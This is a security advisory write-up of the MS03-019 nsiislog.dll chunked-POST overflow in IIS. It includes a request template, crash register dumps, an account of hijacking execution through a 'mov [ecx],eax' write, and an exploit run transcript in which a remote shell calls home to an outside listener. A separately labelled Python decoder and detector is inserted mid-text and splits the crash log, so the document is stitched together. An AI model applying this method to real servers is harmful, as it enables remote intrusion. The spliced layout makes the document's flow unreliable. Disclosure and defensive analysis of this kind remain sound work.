A long time ago, in a place far far away…
Well actually it was four months ago over here in New Zealand. Christmas
holidays had finished and I was halfway through contemplating writing
a paper entitled 'The Methodical Approach To Finding Overflows'.
I thought I had better try out the concept behind this approach and the
issues discovered in nsiislog.dll are some of the results of it.
== MS03-019 states ==
Impact: Allow an attacker to execute code of their choice
Max Risk: Important
There is a flaw in the way in which nsiislog.dll processes incoming
requests. A vulnerability exists because an attacker could send specially
formed communications to the server that could cause IIS to stop responding
to Internet requests.
The vulnerability results because of an unchecked buffer used by the
nsiislog.dll file for logging. If a specially crafted request is sent to the
server, the logging file will attempt to write a larger buffer than is
possible, which then in turn causes the IIS service to fail.
== MS03-019 ==
== Description ==
Sending a chunked encoded post to nsiislog.dll will cause an access
violation resulting in the following error log.
A chunked encoded post will result in the control of EAX and ECX, with
the exception occurring at a mov dword ptr [ecx],eax instruction.
This allows remote command execution with privileges associated with the
IWAM_machinename account.
== Chunked Transfer-Encoding Post ==
POST /scripts/nsiislog.dll HTTP/1.1
Transfer-Encoding: chunked
PostLength
PostData
0
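The request above is framed with HTTP/1.1 chunked transfer-encoding: each chunk is a hex length line, the data, and a CRLF, terminated by a zero-length chunk. The bulletin's root cause is a logging buffer that is written without first checking the decoded size. As an added example (not code from the advisory or from nsiislog.dll), the following Python decoder enforces a size limit before any chunk data is buffered, and a small helper flags chunked POSTs aimed at nsiislog.dll so a proxy or log reviewer can spot the pattern. The MAX_BODY value and all request bytes are constructed for illustration; the real limit inside nsiislog.dll is not given on the page.

```python
# Added example, not from the advisory: a bounded chunked-body decoder and a
# request-flagging helper. MAX_BODY is a hypothetical cap chosen for the demo.

MAX_BODY = 4096  # hypothetical limit; the actual nsiislog.dll buffer size is not on the page


class ChunkedBodyError(ValueError):
    """Raised when a chunked body is malformed or exceeds the allowed size."""


def decode_chunked(raw: bytes, max_body: int = MAX_BODY) -> bytes:
    """Decode an HTTP/1.1 chunked body.

    The running total is checked against max_body *before* each chunk is
    copied, so an oversized body is rejected rather than written past a
    fixed-size buffer (the class of defect MS03-019 describes).
    """
    out = bytearray()
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol == -1:
            raise ChunkedBodyError("missing chunk-size line")
        # Chunk extensions (";name=value") are permitted by HTTP but ignored here.
        size_field = raw[pos:eol].split(b";", 1)[0].strip()
        try:
            size = int(size_field, 16)
        except ValueError:
            raise ChunkedBodyError(f"bad chunk size {size_field!r}")
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last-chunk reached; trailers are not parsed
        if len(out) + size > max_body:
            raise ChunkedBodyError(f"body exceeds {max_body} bytes")
        chunk = raw[pos:pos + size]
        if len(chunk) != size or raw[pos + size:pos + size + 2] != b"\r\n":
            raise ChunkedBodyError("truncated chunk or missing CRLF")
        out += chunk
        pos += size + 2


def accepts(raw: bytes, max_body: int = MAX_BODY) -> bool:
    """True if the chunked body decodes within the limit, False otherwise."""
    try:
        decode_chunked(raw, max_body)
        return True
    except ChunkedBodyError:
        return False


def is_suspicious_request(request_head: bytes) -> bool:
    """Flag a chunked POST whose path ends in nsiislog.dll (the advisory's pattern)."""
    lines = request_head.split(b"\r\n")
    request_line = lines[0].split()
    if len(request_line) < 2 or request_line[0].upper() != b"POST":
        return False
    path = request_line[1].split(b"?", 1)[0].lower()
    chunked = any(
        line.lower().startswith(b"transfer-encoding:") and b"chunked" in line.lower()
        for line in lines[1:]
    )
    return path.endswith(b"/nsiislog.dll") and chunked


if __name__ == "__main__":
    # Constructed sample request, mirroring the shape shown in the advisory.
    head = b"POST /scripts/nsiislog.dll HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n"
    body = b"5\r\nhello\r\n0\r\n\r\n"
    print("flagged:", is_suspicious_request(head))
    print("decoded:", decode_chunked(body))
```

The check `len(out) + size > max_body` runs on the declared chunk length, so a request announcing a huge chunk is refused before any of its data is read; that ordering is the whole point when the downstream consumer is a fixed-size log buffer.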
7800F5ED dec dword ptr [esi] ESI = 58585858
Using Size: 510
Connecting…Sending Buffer…
77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858
77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858
== Exploitation ==
The infamous 'mov dword ptr [ecx],eax' which allows an attacker to take
control by placing a value into a position that is later retrieved for the
EIP register.
In this case the exception was handled internally so execution flow could
not be obtained by taking advantage of SEH, but we were successful in
obtaining control by overwriting a portion of another 3 letter acronym.
== Exploit Example ==
%:\>exploit 192.168.1.63
IISNSLOG.DLL - 4.1.0.3920 - Remote Shell
. Calling Home: blackhole:2000
. Using: 0x########h as ABC overwrite
. Using: 0x########h as direct jump location
. Shellcode Size: 322 bytes
. Preparing Exploit Buffer…Ready
. Starting Listener On Port: 2000
. Connecting To Target
. Sending Exploit…Exploit Sent
. Connection Received
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
IWAM_BLACKHOLE
C:\WINNT\system32>
== Solutions ==
== Credit ==
Discovered and advised to Microsoft January 27, 2003 by Brett Moore.
%-) shutz to: eEye, spyrit and all kiwis with hackfu
%-) ha. we'll just say: "All of your livers are belong to us".